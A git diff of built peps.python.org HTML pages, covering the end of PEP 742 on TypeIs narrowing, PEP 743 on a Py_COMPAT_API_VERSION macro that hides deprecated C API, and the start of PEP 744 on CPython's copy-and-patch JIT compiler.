+def is_direction(x: str) -> TypeIs[Direction]:
+    return x in {"N", "E", "S", "W"}
+
+def maybe_direction(x: str) -> None:
+    if is_direction(x):
+        print(f"{x} is a cardinal direction")
+    else:
+        print(f"{x} is not a cardinal direction")
+
+
+
+
+

Writing a safe TypeIs function

+

A TypeIs function allows you to override your type checker’s type narrowing +behavior. This is a powerful tool, but it can be dangerous because an incorrectly +written TypeIs function can lead to unsound type checking, and type checkers +cannot detect such errors.

+

For a function returning TypeIs[T] to be safe, it must return True if and only if +the argument is compatible with type T, and False otherwise. If this condition is +not met, the type checker may infer incorrect types.

+

Below are some examples of correct and incorrect TypeIs functions:

+
from typing import TypeIs
+
+# Correct
+def good_typeis(x: object) -> TypeIs[int]:
+    return isinstance(x, int)
+
+# Incorrect: does not return True for all ints
+def bad_typeis1(x: object) -> TypeIs[int]:
+    return isinstance(x, int) and x > 0
+
+# Incorrect: returns True for some non-ints
+def bad_typeis2(x: object) -> TypeIs[int]:
+    return isinstance(x, (int, float))
+
+
+

This function demonstrates some errors that can occur when using a poorly written +TypeIs function. These errors are not detected by type checkers:

+
def caller(x: int | str, y: int | float) -> None:
+    if bad_typeis1(x):  # narrowed to int
+        print(x + 1)
+    else:  # narrowed to str (incorrectly)
+        print("Hello " + x)  # runtime error if x is a negative int
+
+    if bad_typeis2(y):  # narrowed to int
+        # Because of the incorrect TypeIs, this branch is taken at runtime if
+        # y is a float.
+        print(y.bit_count())  # runtime error: this method exists only on int, not float
+    else:  # narrowed to float (though never executed at runtime)
+        pass
+
+
+

Here is an example of a correct TypeIs function for a more complicated type:

+
from typing import TypedDict, TypeIs
+
+class Point(TypedDict):
+    x: int
+    y: int
+
+def is_point(x: object) -> TypeIs[Point]:
+    return (
+        isinstance(x, dict)
+        and all(isinstance(key, str) for key in x)
+        and "x" in x
+        and "y" in x
+        and isinstance(x["x"], int)
+        and isinstance(x["y"], int)
+    )
+
+
+
+
+

TypeIs and TypeGuard

+

TypeIs and typing.TypeGuard are both tools for narrowing the type of a variable +based on a user-defined function. Both can be used to annotate functions that take an +argument and return a boolean depending on whether the input argument is compatible with +the narrowed type. These functions can then be used in if checks to narrow the type +of a variable.

+

TypeIs usually has the most intuitive behavior, but it +introduces more restrictions. TypeGuard is the right tool to use if:

+
    +
  • You want to narrow to a type that is not compatible with the input type, for example +from list[object] to list[int]. TypeIs only allows narrowing between +compatible types.
  • +
  • Your function does not return True for all input values that are compatible with +the narrowed type. For example, you could have a TypeGuard[int] that returns True +only for positive integers.
  • +
+

TypeIs and TypeGuard differ in the following ways:

+
    +
  • TypeIs requires the narrowed type to be a subtype of the input type, while +TypeGuard does not.
  • +
  • When a TypeGuard function returns True, type checkers narrow the type of the +variable to exactly the TypeGuard type. When a TypeIs function returns True, +type checkers can infer a more precise type combining the previously known type of the +variable with the TypeIs type. (Technically, this is known as an intersection type.)
  • +
  • When a TypeGuard function returns False, type checkers cannot narrow the type of +the variable at all. When a TypeIs function returns False, type checkers can narrow +the type of the variable to exclude the TypeIs type.
  • +
+

This behavior can be seen in the following example:

+
from typing import TypeGuard, TypeIs, reveal_type, final
+
+class Base: ...
+class Child(Base): ...
+@final
+class Unrelated: ...
+
+def is_base_typeguard(x: object) -> TypeGuard[Base]:
+    return isinstance(x, Base)
+
+def is_base_typeis(x: object) -> TypeIs[Base]:
+    return isinstance(x, Base)
+
+def use_typeguard(x: Child | Unrelated) -> None:
+    if is_base_typeguard(x):
+        reveal_type(x)  # Base
+    else:
+        reveal_type(x)  # Child | Unrelated
+
+def use_typeis(x: Child | Unrelated) -> None:
+    if is_base_typeis(x):
+        reveal_type(x)  # Child
+    else:
+        reveal_type(x)  # Unrelated
+
+
+
+
+
+

Reference Implementation

+

The TypeIs special form has been implemented +in the typing_extensions module and will be released in typing_extensions 4.10.0.

+

Implementations are available for several type checkers:

+ +
+
+

Rejected Ideas

+
+

Change the behavior of TypeGuard

+

PEP 724 previously proposed changing the specified behavior of typing.TypeGuard so +that if the return type of the guard is consistent with the input type, the behavior proposed +here for TypeIs would apply. This proposal has some important advantages: because it +does not require any runtime changes, it requires changes only in type checkers, making it easier +for users to take advantage of the new, usually more intuitive behavior.

+

However, this approach has some major problems. Users who have written TypeGuard functions +expecting the existing semantics specified in PEP 647 would see subtle and potentially breaking +changes in how type checkers interpret their code. The split behavior of TypeGuard, where it +works one way if the return type is consistent with the input type and another way if it is not, +could be confusing for users. The Typing Council was unable to come to an agreement in favor of +PEP 724; as a result, we are proposing this alternative PEP.

+
+
+

Do nothing

+

Both this PEP and the alternative proposed in PEP 724 have shortcomings. The latter are +discussed above. As for this PEP, it introduces two special forms with very similar semantics, +and it potentially creates a long migration path for users currently using TypeGuard +who would be better off with different narrowing semantics.

+

One way forward, then, is to do nothing and live with the current limitations of the type system. +However, we believe that the limitations of the current TypeGuard, as outlined in the “Motivation” +section, are significant enough that it is worthwhile to change the type system to address them. +If we do not make any change, users will continue to encounter the same unintuitive behaviors from +TypeGuard, and the type system will be unable to properly represent common type narrowing functions +like inspect.isawaitable.

+
+
+

Alternative names

+

This PEP currently proposes the name TypeIs, emphasizing that the special form TypeIs[T] +returns whether the argument is of type T, and mirroring +TypeScript’s syntax. +Other names were considered, including in an earlier version of this PEP.

+

Options include:

+
    +
  • IsInstance (post by Paul Moore): +emphasizes that the new construct behaves similarly to the builtin isinstance().
  • +
  • Narrowed or NarrowedTo: shorter than TypeNarrower but keeps the connection to “type narrowing” +(suggested by Eric Traut).
  • +
  • Predicate or TypePredicate: mirrors TypeScript’s name for the feature, “type predicates”.
  • +
  • StrictTypeGuard (earlier drafts of PEP 724): emphasizes that the new construct performs a stricter +version of type narrowing than typing.TypeGuard.
  • +
  • TypeCheck (post by Nicolas Tessore): +emphasizes the binary nature of the check.
  • +
  • TypeNarrower: emphasizes that the function narrows its argument type. Used in an earlier version of this PEP.
  • +
+
+
+
+

Acknowledgments

+

Much of the motivation and specification for this PEP derives from PEP 724. While +this PEP proposes a different solution for the problem at hand, the authors of PEP 724, Eric Traut, Rich +Chiodo, and Erik De Bonte, made a strong case for their proposal and this proposal +would not have been possible without their work.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0742.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0743/index.html b/pep-0743/index.html new file mode 100644 index 00000000000..b22b6725b35 --- /dev/null +++ b/pep-0743/index.html @@ -0,0 +1,707 @@ + + + + + + + + PEP 743 – Add Py_COMPAT_API_VERSION to the Python C API | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 743 – Add Py_COMPAT_API_VERSION to the Python C API

+
+
Author:
+
Victor Stinner <vstinner at python.org>, +Petr Viktorin <encukou at gmail.com>
+
PEP-Delegate:
+
C API Working Group
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
11-Mar-2024
+
Python-Version:
+
3.14
+
+
+
+
Table of Contents +
+
+

Abstract

+

Add a Py_COMPAT_API_VERSION C macro that hides some deprecated and +soft-deprecated symbols, allowing users to opt out of using API with known +issues that other API solves. +The macro is versioned, allowing users to update (or not) at their own pace.

+

Also, add namespaced alternatives for API without the Py_ prefix, +and soft-deprecate the original names.

+
+
+

Motivation

+

Some of Python’s C API has flaws that are only obvious in hindsight.

+

If an API prevents adding features or optimizations, or presents a serious +security risk or maintenance burden, we can deprecate and remove it as +described in PEP 387.

+

However, this leaves us with some API that has “sharp edges” – it works fine +for its current users, but should be avoided in new code. +For example:

+
    +
  • API that cannot signal an exception, so failures are either ignored or +exit the process with a fatal error. For example PyObject_HasAttr.
  • +
  • API that is not thread-safe, for example by borrowing references from +mutable objects, or exposing unfinished mutable objects. For example +PyDict_GetItemWithError.
  • +
  • API with names that don’t use the Py/_Py prefix, and so can clash +with other code. For example: setter.
  • +
+

It is important to note that despite such flaws, it’s usually possible +to use the API correctly. For example, in a single-threaded environment, +thread safety is not an issue. +We do not want to break working code, even if it uses API that would be wrong +in some – or even most – other contexts.

+

On the other hand, we want to steer users away from such “undesirable” API +in new code, especially if a safer alternative exists.

+
+

Adding the Py prefix

+

Some names defined in CPython headers are not namespaced: they lack the +Py prefix (or a variant: _Py, or alternative capitalizations). +For example, we declare a function type named simply setter.

+

While such names are not exported in the ABI (as checked by make smelly), +they can clash with user code and, more importantly, with libraries linked +to third-party extensions.

+

While it would be possible to provide namespaced aliases and (soft-)deprecate +these names, the only way to make them not clash with third-party code is to +not define them in Python headers at all.

+
+
+
+

Rationale

+

We want to allow an easy way for users to avoid “undesirable” API if they +choose to do so.

+

It might be sufficient to leave this to third-party linters. +For that we’d need a good way to expose a list of (soft-)deprecated +API to such linters. +While adding that, we can – rather easily – do the linter’s job directly +in CPython headers, avoiding the need for an extra tool. +Unlike Python, C makes it rather easy to limit available API – for a whole +project or for each individual source file – by having users define +an “opt-in” macro.

+

We already do something similar with Py_LIMITED_API, which limits the +available API to a subset that compiles to stable ABI. (In hindsight, we should +have used a different macro name for that particular kind of limiting, but it’s +too late to change that now.)

+

To prevent working code from breaking as we identify more “undesirable” API +and add safer alternatives to it, the opt-in macro should be versioned. +Users can choose a version they need based on their compatibility requirements, +and update it at their own pace.

+

To be clear, this mechanism is not a replacement for deprecation. +Deprecation is for API that prevents new features or optimizations, or +presents a security risk or maintenance burden. +This mechanism, on the other hand, is meant for cases where “we found +a slightly better way of doing things” – perhaps one that’s harder to misuse, +or just has a less misleading name. +(On a lighter note: many people configure a code quality checker to shout at +them about the number of blank lines between functions. Let’s help them +identify more substantial “code smells”!)

+

The proposed macro does not change any API definitions; it only hides them. +So, if code compiles with the macro, it’ll also compile without it, with +identical behaviour. +This has implications for core devs: to deal with undesirable behaviour, +we’ll need to introduce new, better API, and then discourage the old one. +In turn, this implies that we should look at an individual API and fix all its +known issues at once, rather than do codebase-wide sweeps for a single kind of +issue, so that we avoid multiple renames of the same function.

+
+

Adding the Py prefix

+

An opt-in macro allows us to omit definitions that could clash with +third-party libraries.

+
+
+
+

Specification

+

We introduce a Py_COMPAT_API_VERSION macro. +If this macro is defined before #include <Python.h>, some API definitions +– as described below – will be omitted from the Python header files.

+

The macro only omits complete top-level definitions exposed from <Python.h>. +Other things (the ABI, structure definitions, macro expansions, static inline +function bodies, etc.) are not affected.

+

The C API working group (PEP 731) has authority over the set of omitted +definitions.

+

The set of omitted definitions will be tied to a particular feature release +of CPython, and is finalized in each 3.x.0 Beta 1 release. +In rare cases, entries can be removed (i.e. made available for use) at any +time.

+

The macro should be defined to a version in the format used by +PY_VERSION_HEX, with the “micro”, “release” and “serial” fields +set to zero. +For example, to omit API deemed undesirable in 3.14.0b1, users should define +Py_COMPAT_API_VERSION to 0x030e0000.
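For example, a minimal sketch of opting in; PyDict_GetItemRef() is the documented replacement for PyDict_GetItem() (see the Initial set below):

// Opt in to the 3.14 compatibility set before including Python.h:
#define Py_COMPAT_API_VERSION 0x030e0000
#include <Python.h>

// With the macro defined, omitted API such as PyDict_GetItem() is not
// declared; code must use the documented replacement instead:
static int
get_item(PyObject *dict, PyObject *key, PyObject **value)
{
    // Returns 1 and a strong reference in *value if the key is present,
    // 0 if the key is missing, and -1 with an exception set on error.
    return PyDict_GetItemRef(dict, key, value);
}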

+
+

Requirements for omitted API

+

An API that is omitted with Py_COMPAT_API_VERSION must:

+
    +
  • be soft-deprecated (see PEP 387);
  • +
  • for all known use cases of the API, have a documented alternative +or workaround;
  • +
  • have tests to ensure it keeps working (except for 1:1 renames using +#define or typedef);
  • +
  • be documented (except if it was never mentioned in previous versions of the +documentation); and
  • +
  • be approved by the C API working group. (The WG may give blanket approvals +for groups of related API; see Initial set below for examples.)
  • +
+

Note that Py_COMPAT_API_VERSION is meant for API that can be trivially +replaced by a better alternative. +API without a replacement should generally be deprecated instead.

+
+
+

Location

+

All API definitions omitted by Py_COMPAT_API_VERSION will be moved to +a new header, Include/legacy.h.

+

This is meant to help linter authors compile lists, so they can flag the API +with warnings rather than errors.

+

Note that for simple renaming of source-only constructs (macros, types), we +expect names to be omitted in the same version – or the same PR – that adds +a replacement. +This means that the original definition will be renamed, and a typedef +or #define for the old name added to Include/legacy.h.
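For example, with the (hypothetical) prefixed typedef Py_getter proposed
later in this PEP, the main headers would carry the renamed definition and
Include/legacy.h only the alias for the old spelling (the version check is
simplified here for brevity):

/* Main headers: the renamed definition. (Py_getter is a hypothetical
 * prefixed spelling; the signature matches the existing getter typedef.) */
typedef PyObject *(*Py_getter)(PyObject *, void *);

/* Include/legacy.h: the old name, hidden by Py_COMPAT_API_VERSION. */
#ifndef Py_COMPAT_API_VERSION
typedef Py_getter getter;
#endif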

+
+
+

Documentation

+

Documentation for omitted API should generally:

+
    +
  • appear after the recommended replacement,
  • +
  • reference the replacement (e.g. “Similar to X, but…”), and
  • +
  • focus on differences from the replacement and migration advice.
  • +
+

Exceptions are possible if there is a good reason for them.

+
+
+

Initial set

+

The following API will be omitted with Py_COMPAT_API_VERSION set to +0x030e0000 (3.14) or greater:

+
    +
  • Omit API returning borrowed references (a migration sketch follows this list):
    Omitted API               Replacement
    PyDict_GetItem()          PyDict_GetItemRef()
    PyDict_GetItemString()    PyDict_GetItemStringRef()
    PyImport_AddModule()      PyImport_AddModuleRef()
    PyList_GetItem()          PyList_GetItemRef()
    +
  • +
  • Omit deprecated APIs:

    Omitted Deprecated API              Replacement
    PY_FORMAT_SIZE_T                    "z"
    PY_UNICODE_TYPE                     wchar_t
    PyCode_GetFirstFree()               PyUnstable_Code_GetFirstFree()
    PyCode_New()                        PyUnstable_Code_New()
    PyCode_NewWithPosOnlyArgs()         PyUnstable_Code_NewWithPosOnlyArgs()
    PyImport_ImportModuleNoBlock()      PyImport_ImportModule()
    PyMem_DEL()                         PyMem_Free()
    PyMem_Del()                         PyMem_Free()
    PyMem_FREE()                        PyMem_Free()
    PyMem_MALLOC()                      PyMem_Malloc()
    PyMem_NEW()                         PyMem_New()
    PyMem_REALLOC()                     PyMem_Realloc()
    PyMem_RESIZE()                      PyMem_Resize()
    PyModule_GetFilename()              PyModule_GetFilenameObject()
    PyOS_AfterFork()                    PyOS_AfterFork_Child()
    PyObject_DEL()                      PyObject_Free()
    PyObject_Del()                      PyObject_Free()
    PyObject_FREE()                     PyObject_Free()
    PyObject_MALLOC()                   PyObject_Malloc()
    PyObject_REALLOC()                  PyObject_Realloc()
    PySlice_GetIndicesEx()              (two calls; see current docs)
    PyThread_ReInitTLS()                (no longer needed)
    PyThread_create_key()               PyThread_tss_alloc()
    PyThread_delete_key()               PyThread_tss_free()
    PyThread_delete_key_value()         PyThread_tss_delete()
    PyThread_get_key_value()            PyThread_tss_get()
    PyThread_set_key_value()            PyThread_tss_set()
    PyUnicode_AsDecodedObject()         PyUnicode_Decode()
    PyUnicode_AsDecodedUnicode()        PyUnicode_Decode()
    PyUnicode_AsEncodedObject()         PyUnicode_AsEncodedString()
    PyUnicode_AsEncodedUnicode()        PyUnicode_AsEncodedString()
    PyUnicode_IS_READY()                (no longer needed)
    PyUnicode_READY()                   (no longer needed)
    PyWeakref_GET_OBJECT()              PyWeakref_GetRef()
    PyWeakref_GetObject()               PyWeakref_GetRef()
    Py_UNICODE                          wchar_t
    _PyCode_GetExtra()                  PyUnstable_Code_GetExtra()
    _PyCode_SetExtra()                  PyUnstable_Code_SetExtra()
    _PyDict_GetItemStringWithError()    PyDict_GetItemStringRef()
    _PyEval_RequestCodeExtraIndex()     PyUnstable_Eval_RequestCodeExtraIndex()
    _PyHASH_BITS                        PyHASH_BITS
    _PyHASH_IMAG                        PyHASH_IMAG
    _PyHASH_INF                         PyHASH_INF
    _PyHASH_MODULUS                     PyHASH_MODULUS
    _PyHASH_MULTIPLIER                  PyHASH_MULTIPLIER
    _PyObject_EXTRA_INIT                (no longer needed)
    _PyThreadState_UncheckedGet()       PyThreadState_GetUnchecked()
    _PyUnicode_AsString()               PyUnicode_AsUTF8()
    _Py_HashPointer()                   Py_HashPointer()
    _Py_T_OBJECT                        Py_T_OBJECT_EX
    _Py_WRITE_RESTRICTED                (no longer needed)
    +
  • +
  • Soft-deprecate and omit APIs:

    Omitted API                  Replacement
    PyDict_GetItemWithError()    PyDict_GetItemRef()
    PyDict_SetDefault()          PyDict_SetDefaultRef()
    PyMapping_HasKey()           PyMapping_HasKeyWithError()
    PyMapping_HasKeyString()     PyMapping_HasKeyStringWithError()
    PyObject_HasAttr()           PyObject_HasAttrWithError()
    PyObject_HasAttrString()     PyObject_HasAttrStringWithError()
    +
  • +
  • Omit <structmember.h> legacy API:

    The header file structmember.h, which is not included from <Python.h> +and must be included separately, will #error if +Py_COMPAT_API_VERSION is defined. +This affects the following API:

    Omitted Deprecated API    Replacement
    T_SHORT                   Py_T_SHORT
    T_INT                     Py_T_INT
    T_LONG                    Py_T_LONG
    T_FLOAT                   Py_T_FLOAT
    T_DOUBLE                  Py_T_DOUBLE
    T_STRING                  Py_T_STRING
    T_OBJECT                  (tp_getset; docs to be written)
    T_CHAR                    Py_T_CHAR
    T_BYTE                    Py_T_BYTE
    T_UBYTE                   Py_T_UBYTE
    T_USHORT                  Py_T_USHORT
    T_UINT                    Py_T_UINT
    T_ULONG                   Py_T_ULONG
    T_STRING_INPLACE          Py_T_STRING_INPLACE
    T_BOOL                    Py_T_BOOL
    T_OBJECT_EX               Py_T_OBJECT_EX
    T_LONGLONG                Py_T_LONGLONG
    T_ULONGLONG               Py_T_ULONGLONG
    T_PYSSIZET                Py_T_PYSSIZET
    T_NONE                    (tp_getset; docs to be written)
    READONLY                  Py_READONLY
    PY_AUDIT_READ             Py_AUDIT_READ
    READ_RESTRICTED           Py_AUDIT_READ
    PY_WRITE_RESTRICTED       (no longer needed)
    RESTRICTED                Py_AUDIT_READ
    +
  • +
  • Omit soft deprecated macros:

    Omitted Macros       Replacement
    Py_IS_NAN()          isnan() (C99+ <math.h>)
    Py_IS_INFINITY()     isinf(X) (C99+ <math.h>)
    Py_IS_FINITE()       isfinite(X) (C99+ <math.h>)
    Py_MEMCPY()          memcpy() (C <string.h>)
    +
  • +
  • Soft-deprecate and omit typedefs without the Py/_Py prefix
(getter, setter, allocfunc, …), in favour of new ones
that add the prefix (Py_getter, etc.)
  • +
  • Soft-deprecate and omit macros without the Py/_Py prefix
(METH_O, CO_COROUTINE, FUTURE_ANNOTATIONS, WAIT_LOCK, …),
in favour of new ones that add the prefix (Py_METH_O, etc.).
  • +
  • Any others approved by the C API working group.
  • +
+
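As referenced in the first item above, migrating off a borrowed-reference
function is mechanical. A minimal, hedged sketch, assuming CPython 3.13 or
later (where PyDict_GetItemRef() is available):

#include <Python.h>

/* Replacing borrowed-reference PyDict_GetItem() with PyDict_GetItemRef(),
 * which returns a strong reference and reports errors explicitly. */
static int
print_item(PyObject *dict, PyObject *key)
{
    PyObject *item;
    int rc = PyDict_GetItemRef(dict, key, &item);
    if (rc < 0) {
        return -1;          /* error: an exception is set */
    }
    if (rc == 0) {
        return 0;           /* key not present; item is NULL */
    }
    rc = PyObject_Print(item, stdout, 0);
    Py_DECREF(item);        /* unlike PyDict_GetItem(), we own a reference */
    return rc;
}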

If any of these proposed replacements, or associated documentation, +are not added in time for 3.14.0b1, they’ll be omitted with later versions +of Py_COMPAT_API_VERSION. +(We expect this for macros generated by configure: HAVE_*, WITH_*, +ALIGNOF_*, SIZEOF_*, and several without a common prefix.)

+
+
+
+

Implementation

+

TBD

+
+
+

Open issues

+

The name Py_COMPAT_API_VERSION was taken from an earlier version of this
PEP; it no longer fits this revision of the proposal and should probably be
changed.

+
+
+

Backwards Compatibility

+

The macro is backwards compatible.
Developers can introduce and update the macro at their own pace, potentially
for one source file at a time.

+
+
+

Discussions

+ +
+
+

Prior Art

+
    +
  • Py_LIMITED_API macro of PEP 384 “Defining a Stable ABI”.
  • +
  • Rejected PEP 606 “Python Compatibility Version” which has a global +scope.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0743.rst

+

Last modified: 2024-11-26 11:55:57 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0744/index.html b/pep-0744/index.html new file mode 100644 index 00000000000..bdccb3284e4 --- /dev/null +++ b/pep-0744/index.html @@ -0,0 +1,663 @@ + + + + + + + + PEP 744 – JIT Compilation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 744 – JIT Compilation

+
+
Author:
+
Brandt Bucher <brandt at python.org>, +Savannah Ostrowski <savannahostrowski at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Informational
+
Created:
+
11-Apr-2024
+
Python-Version:
+
3.13
+
Post-History:
+
11-Apr-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

Earlier this year, an experimental “just-in-time” compiler was merged into CPython’s +main development branch. While recent CPython releases have included other +substantial internal changes, this addition represents a particularly +significant departure from the way CPython has traditionally executed Python +code. As such, it deserves wider discussion.

+

This PEP aims to summarize the design decisions behind this addition, the +current state of the implementation, and future plans for making the JIT a +permanent, non-experimental part of CPython. It does not seek to provide a +comprehensive overview of how the JIT works, instead focusing on the +particular advantages and disadvantages of the chosen approach, as well as +answering many questions that have been asked about the JIT since its +introduction.

+

Readers interested in learning more about the new JIT are encouraged to consult +the following resources:

+
    +
  • The presentation which first introduced the +JIT at the 2023 CPython Core Developer Sprint. It includes relevant +background, a light technical introduction to the “copy-and-patch” technique +used, and an open discussion of its design amongst the core developers +present. Slides for this talk can be found on GitHub.
  • +
  • The open access paper originally +describing copy-and-patch.
  • +
  • The blog post by the +paper’s author detailing the implementation of a copy-and-patch JIT compiler +for Lua. While this is a great low-level explanation of the approach, note +that it also incorporates other techniques and makes implementation decisions +that are not particularly relevant to CPython’s JIT.
  • +
  • The implementation itself.
  • +
+
+
+

Motivation

+

Until this point, CPython has always executed Python code by compiling it to +bytecode, which is interpreted at runtime. This bytecode is a more-or-less +direct translation of the source code: it is untyped, and largely unoptimized.

+

Since the Python 3.11 release, CPython has used a “specializing adaptive
interpreter” (PEP 659), which rewrites these bytecode instructions in-place with type-specialized versions as they run.
This new interpreter delivers significant performance improvements, despite the
fact that its optimization potential is limited by the boundaries of individual
bytecode instructions. It also collects a wealth of new profiling information:
the types flowing through a program, the memory layout of particular objects, and
what paths through the program are being executed the most. In other words,
what to optimize, and how to optimize it.

+

Since the Python 3.12 release, CPython has generated this interpreter from a +C-like domain-specific language (DSL). In +addition to taming some of the complexity of the new adaptive interpreter, the +DSL also allows CPython’s maintainers to avoid hand-writing tedious boilerplate +code in many parts of the interpreter, compiler, and standard library that must +be kept in sync with the instruction definitions. This ability to generate large +amounts of runtime infrastructure from a single source of truth is not only +convenient for maintenance; it also unlocks many possibilities for expanding +CPython’s execution in new ways. For instance, it makes it feasible to +automatically generate tables for translating a sequence of instructions into an +equivalent sequence of smaller “micro-ops”, generate an optimizer for sequences +of these micro-ops, and even generate an entire second interpreter for executing +them.

+

In fact, since early in the Python 3.13 release cycle, all CPython builds have +included this exact micro-op translation, optimization, and execution machinery. +However, it is disabled by default; the overhead of interpreting even optimized +traces of micro-ops is just too large for most code. Heavier optimization +probably won’t improve the situation much either, since any efficiency gains +made by new optimizations will likely be offset by the interpretive overhead of +even smaller, more complex micro-ops.

+

The most obvious strategy to overcome this new bottleneck is to statically +compile these optimized traces. This presents opportunities to avoid several +sources of indirection and overhead introduced by interpretation. In particular, +it allows the removal of dispatch overhead between micro-ops (by replacing a +generic interpreter with a straight-line sequence of hot code), instruction +decoding overhead for individual micro-ops (by “burning” the values or addresses +of arguments, constants, and cached values directly into machine instructions), +and memory traffic (by moving data off of heap-allocated Python frames and into +physical hardware registers).

+

Since much of this data varies even between identical runs of a program, and the
existing optimization pipeline makes heavy use of runtime profiling information,
it doesn’t make much sense to compile these traces ahead of time; doing so would
also require a substantial redesign of the specialization and micro-op tracing
infrastructure that has already been implemented. As has been demonstrated for
many other dynamic languages (and even Python itself), the most promising
approach is to compile the optimized micro-ops “just in time” for execution.

+
+
+

Rationale

+

Despite their reputation, JIT compilers are not magic “go faster” machines. +Developing and maintaining any sort of optimizing compiler for even a single +platform, let alone all of CPython’s most popular supported platforms, is an +incredibly complicated, expensive task. Using an existing compiler framework +like LLVM can make this task simpler, but only at the cost of introducing heavy +runtime dependencies and significantly higher JIT compilation overhead.

+

It’s clear that successfully compiling Python code at runtime requires not only +high-quality Python-specific optimizations for the code being run, but also +quick generation of efficient machine code for the optimized program. The Python +core development team has the necessary skills and experience for the former (a +middle-end tightly coupled to the interpreter), and copy-and-patch compilation +provides an attractive solution for the latter.

+

In a nutshell, copy-and-patch allows a high-quality template JIT compiler to be +generated from the same DSL used to generate the rest of the interpreter. For a +widely-used, volunteer-driven project like CPython, this benefit cannot be +overstated: CPython’s maintainers, by merely editing the bytecode definitions, +will also get the JIT backend updated “for free”, for all JIT-supported +platforms, at once. This is equally true whether instructions are being added, +modified, or removed.
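The following toy sketch illustrates the copy-and-patch idea itself, using
plain data in place of real machine code; it is not CPython’s implementation,
whose templates are generated at build time and stamped into executable memory:

/* A toy illustration of copy-and-patch: a pre-compiled "template" contains a
 * recognizable placeholder value (a "hole"); at JIT time the template bytes
 * are copied and the hole is overwritten with the real operand. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HOLE 0xDEADBEEFCAFEF00Dull  /* magic value burned in at build time */

int main(void)
{
    /* Pretend these words are the machine code for one micro-op. */
    const uint64_t template_code[3] = { 0x1111, HOLE, 0x2222 };

    /* "Copy": stamp out a fresh instance of the template. */
    uint64_t instance[3];
    memcpy(instance, template_code, sizeof template_code);

    /* "Patch": overwrite the hole with the actual runtime operand,
     * e.g. the address of a cached object. */
    uint64_t operand = 42;
    for (size_t i = 0; i < 3; i++) {
        if (instance[i] == HOLE) {
            instance[i] = operand;
        }
    }

    printf("%llx %llx %llx\n",
           (unsigned long long)instance[0],
           (unsigned long long)instance[1],
           (unsigned long long)instance[2]);
    return 0;
}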

+

Like the rest of the interpreter, the JIT compiler is generated at build time, +and has no runtime dependencies. It supports a wide range of platforms (see the +Support section below), and has comparatively low maintenance burden. In all, +the current implementation is made up of about 900 lines of build-time Python +code and 500 lines of runtime C code.

+
+
+

Specification

+

The JIT is currently not part of the default build configuration, and it is +likely to remain that way for the foreseeable future (though official binaries +may include it). That said, the JIT will become non-experimental once all of +the following conditions are met:

+
    +
  1. It provides a meaningful performance improvement for at least one popular +platform (realistically, on the order of 5%).
  2. +
  3. It can be built, distributed, and deployed with minimal disruption.
  4. +
  5. The Steering Council, upon request, has determined that it would provide more +value to the community if enabled than if disabled (considering tradeoffs +such as maintenance burden, memory usage, or the feasibility of alternate +designs).
  6. +
+

These criteria should be considered a starting point, and may be expanded over +time. For example, discussion of this PEP may reveal that additional +requirements (such as multiple committed maintainers, a security audit, +documentation in the devguide, support for out-of-process debugging, or a +runtime option to disable the JIT) should be added to this list.

+

Until the JIT is non-experimental, it should not be used in production, and +may be broken or removed at any time without warning.

+

Once the JIT is no longer experimental, it should be treated in much the same +way as other build options such as --enable-optimizations or --with-lto. +It may be a recommended (or even default) option for some platforms, and release +managers may choose to enable it in official releases.

+
+

Support

+

The JIT has been developed for all of PEP 11’s current tier one platforms, +most of its tier two platforms, and one of its tier three platforms. +Specifically, CPython’s main branch has CI +building and testing the JIT for both release and debug builds on:

+
    +
  • aarch64-apple-darwin/clang
  • +
  • aarch64-pc-windows/msvc [1]
  • +
  • aarch64-unknown-linux-gnu/clang [2]
  • +
  • aarch64-unknown-linux-gnu/gcc [2]
  • +
  • i686-pc-windows-msvc/msvc
  • +
  • x86_64-apple-darwin/clang
  • +
  • x86_64-pc-windows-msvc/msvc
  • +
  • x86_64-unknown-linux-gnu/clang
  • +
  • x86_64-unknown-linux-gnu/gcc
  • +
+

It’s worth noting that some platforms, even future tier one platforms, may never +gain JIT support. This can be for a variety of reasons, including insufficient +LLVM support (powerpc64le-unknown-linux-gnu/gcc), inherent limitations of +the platform (wasm32-unknown-wasi/clang), or lack of developer interest +(x86_64-unknown-freebsd/clang).

+

Once JIT support for a platform is added (meaning, the JIT builds successfully +without displaying warnings to the user), it should be treated in much the same +way as PEP 11 prescribes: it should have reliable CI/buildbots, and JIT +failures on tier one and tier two platforms should block releases. Though it’s +not necessary to update PEP 11 to specify JIT support, it may be helpful to +do so anyway. Otherwise, a list of supported platforms should be maintained in +the JIT’s README.

+

Since it should always be possible to build CPython without the JIT, removing +JIT support for a platform should not be considered a backwards-incompatible +change. However, if it is reasonable to do so, the normal deprecation process +should be followed as outlined in PEP 387.

+

The JIT’s build-time dependencies may be changed between releases, within +reason.

+
+
+
+

Backwards Compatibility

+

Because the current interpreter and the JIT backend are both
generated from the same specification, the behavior of Python code should be
completely unchanged. In practice, observable differences that have been found
and fixed during testing have tended to be bugs in the existing micro-op
translation and optimization stages, rather than bugs in the copy-and-patch
step.

+
+

Debugging

+

Tools that profile and debug Python code will continue to work fine. This +includes in-process tools that use Python-provided functionality (like +sys.monitoring, sys.settrace, or sys.setprofile), as well as +out-of-process tools that walk Python frames from the interpreter state.

+

However, it appears that profilers and debuggers for C code are currently +unable to trace back through JIT frames. Working with leaf frames is possible +(this is how the JIT itself is debugged), though it is of limited utility due to +the absence of proper debugging information for JIT frames.

+

